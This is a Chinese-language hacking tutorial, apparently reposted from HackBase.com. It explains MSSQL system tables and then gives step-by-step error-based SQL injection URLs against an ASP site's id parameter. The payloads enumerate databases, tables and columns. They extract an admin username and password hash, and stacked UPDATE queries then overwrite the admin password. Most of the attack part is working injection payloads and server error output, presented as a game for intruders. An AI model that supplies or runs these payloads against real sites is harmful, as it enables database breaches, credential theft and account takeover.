一、分析MSSQL三个关键系统表.
sysdatabases

MSSQL中对sysdatabases系统表 的说明：
Microsoft SQL Server 上的每个数据库在表中占一行。最初安装 SQL Server 时，sysdatabases 包含 master、model、msdb、mssqlweb 和 tempdb 数据库的项。该表只存储在 master 数据库中。

这个表保存在master数据库中，这个表中保存的是什么信息呢？这个非常重要。他是
保存了，所有的库名,以及库的ID，和一些相关信息。
这里我把对于我们有用的字段名称和相关说明给大家列出来.看好咯！

name dbid
//表示库的名字. //表示库的ID.

dbid从1到5是系统的。分别是：master、model、msdb、mssqlweb、tempdb 这五个库.

我们利用SQL语句：select * from master.dbo.sysdatabases 就可以查询出所有的库名.


sysobjects

MSSQL中对sysobjects系统表的说明：
在数据库内创建的每个对象（约束、默认值、日志、规则、存储过程等）在表中占一行。只有在 tempdb 内，每个临时对象才在该表中占一行。

这个是列出数据库对象的系统表。当然数据库表名也在里面的.
这里我就为大家列出一些对我们有用的字段名称和相关说明.
name id xtype uid
对象名. 对象ID 对象类型 所有者对象的用户ID。

对象类型(xtype)。可以是下列对象类型中的一种：
C = CHECK 约束
D = 默认值或 DEFAULT 约束
F = FOREIGN KEY 约束
L = 日志
FN = 标量函数
IF = 内嵌表函数
P = 存储过程
PK = PRIMARY KEY 约束（类型是 K）
RF = 复制筛选存储过程
S = 系统表
TF = 表函数
TR = 触发器
U = 用户表
UQ = UNIQUE 约束（类型是 K）
V = 视图
X = 扩展存储过程

当然我们这里只用得到xtype='U'的值。当等于U的时候，对象名就是表名，对象ID就是表的ID值.

我们利用SQL语句: select * from ChouYFD.dbo.sysobjects where xtype='U' 这样就可以列出库名称是：ChouYFD中所有的表名.

syscolumns

SQL中syscolumns系统表的说明：
每个表和视图中的每列在表中占一行，存储过程中的每个参数在表中也占一行。该表位于每个数据库中。

这个就是列出一个表中所有的字段列表的系统表。
这里我就为大家列出一些对我们有用的字段名称和相关说明:
name id colid
//字段名称 //表ID号. 字段ID号.

其中的 ID 是 刚上我们用sysobjects得到的表的ID号.
我们利用SQL语句: select * from ChouYFD.dbo.syscolumns where id=123456789 得到ChouYFD这个库中，表的ID是123456789中的所有字段列表.
YES SIR 明白！GO GO GO !!!

好了,简单的介绍了一下这个用法.大家如果有不了解的,请查看SQL相关说明.

二、灵活利用系统表
同志们，玩过CS游戏的举手，呵呵，都玩过啊。好！我们今天也要来爆一下"头".
GO GO GO ！！！
不过我们现在爆的是库名，表名，字段名,我们用不着去猜库名，表名，字段名.
说一下怎么爆出相关的库名，表名，字段名.
当两个类型值不一样的时候，将他们做比较,SQL系统会提示出错。并且会显示出类型的值. 如：’aaa’>100 这样比较，也就是字符串和数字的比较，这个怎么比较嘛，系统当然会提示出错啦！大家都知道只有相同类型的时候才可以进行运算.所以这里我们就来一个反方向的不相同类型比较，爆出他的值.

下面就让我们来测试吧！！！准备好没有？GO！

任务一：得到所有库名.
http://www.AAA.com/jump.asp?id=3400 and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)

因为 dbid 的值从1到5，是系统用了。所以用户自己建的一定是从6开始的。并且我们提交了 name>1 NAME字段是一个字符型的字段和数字比较会出错.那我们提交看一下IE返回了什么？

IE返回.

Microsoft OLE DB Provider for SQL Server 错误 '80040e07'

将 nvarchar 值 'Northwind' 转换为数据类型为 int 的列时发生语法错误。

/jump.asp，行33

GOOD!!!这样就把NAME字段的值爆露出来了: Northwind. 也就是我们得到了一个库名.
改变DBID的值.我们可以得出所有的库名.当DBID等于10,11的时候，爆出了两个论坛的库名.分别为:
bbs2002
bbs

呵呵，论坛的库名出来啦！！！那我们就不客气了。就找BBS这个库吧!

任务二：得到bbs这个库中所有的表名.
先来第一句：
http://www.AAA.com/jump.asp?id=3400 and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U')
查询的SQL语句,返回的是NAME的值然后和数字0比较,这样就会爆露出NAME的值.
好我们提交吧,只听到砰的一声！一个表名(name的值)出来了。名叫：Address.
// 这里多说两句话，如果你提交的时候，他说你没有权限，就说明，这两个库的SQL账
//号的权限不一样，那就放弃吧。你没有资格进行下去. 老兄放弃吧！等他更新账号权
//的时候，我第一时间通知你！一定要相信我臭要饭的！话.

好，再来接着爆其他的表.
http://www.AAA.com/jump.asp?id=3400 and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in('Address'))
又出来一个表名，名叫：admin

依次提交 ... and name not in('address','admin',..)) 可以查出所有的表名.

好，现在我们得到了ADMIN这个表，大家都清楚了这个表是做什么的吧！！我们的目的就是要得到这个表中账号字段和密码字段的值。
下面就是要得到这个表中的所有字段名了咧！ 怎么得到字段名呢?系统表: syscolumns
中有用字段为: name、 id、colid 其中ID是保存着表的ID。也就是说我们要得到表的ID号然后，用SELECT * from bbs.dbo.syscolumns where id=bbs表的ID 这样才能列出BBS这个表中所有的字段. 说了半天，哎，说不清楚了。看我表演吧！

http://www.AAA.com/jump.asp?id=3400 and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id)))
//把ID值转成字符型后再和一个整型值比较。我KAO。经典吧，呵呵，这也想得出来。
又听到砰的一声！ID号出来了。值为：773577794
OK.GOOD!! 进入下关吧。

任务三：得到ADMIN这个表中的所有字段列表：
http://www.AAA.com/jump.asp?id=3400 and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794)
又是把NAME和数字比较.

IE 返回：adduser 呵呵，来来来。
http://www.AAA.com/jump.asp?id=3400 and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794 and name not in('adduser'))
又返回一个字段名：flag
http://www.AAA.com/jump.asp?id=3400 and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794 and name not in('adduser','flag'))

好当提交到：
http://www.AAA.com/jump.asp?id=3400 and 0<>(select top 1 name from BBS.dbo.syscolumns
where id=773577794 and name not in('adduser','flag','id','lastlogin','lastloginip','password','username'))

IE返回：BOF 或 EOF 中有一个是"真"，或者当前的记录已被删除，所需的操作要求一个当前的记录。
说明，我们已经猜完了。呵呵，看到了吧。
把BBS库中的ADMIN表中的所有字段列出来了。
分别如下：
adduser,adduser,flag,id,lastlogin,lastloginip,password,username
看了一下，很像动网的论坛。

任务四：查询字段值.
来。我们看看username和password的值吧。

http://www.AAA.com/jump.asp?id=3400 and 0<(select id from BBS.dbo.admin where username>1)
账号出来了：youbiao

http://www.AAA.com/jump.asp?id=3400 and 0<(select id from BBS.dbo.admin where password>1 and username='youbiao')
密码又出来了：d6b2f32a47b8bcb5 我的天MD5的！不怕，呵呵~！！！

来。改一下他的密码:
http://www.AAA.com/jump.asp?id=3400;update BBS.dbo.admin set password='AAABBBCCCDDDEEEF' where username='youbiao';--
呵呵，试试。成功了。我们再来给他改回来.

http://www.AAA.com/jump.asp?id=3400;update BBS.dbo.admin set password='d6b2f32a47b8bcb5' where username='youbiao';--
又改回来咯！！！呵~！


通过提交UPDATE语句就可以直接把密码给他更改了。
                                                                                          转自：作者：YTT 来源：http://www.HackBase.com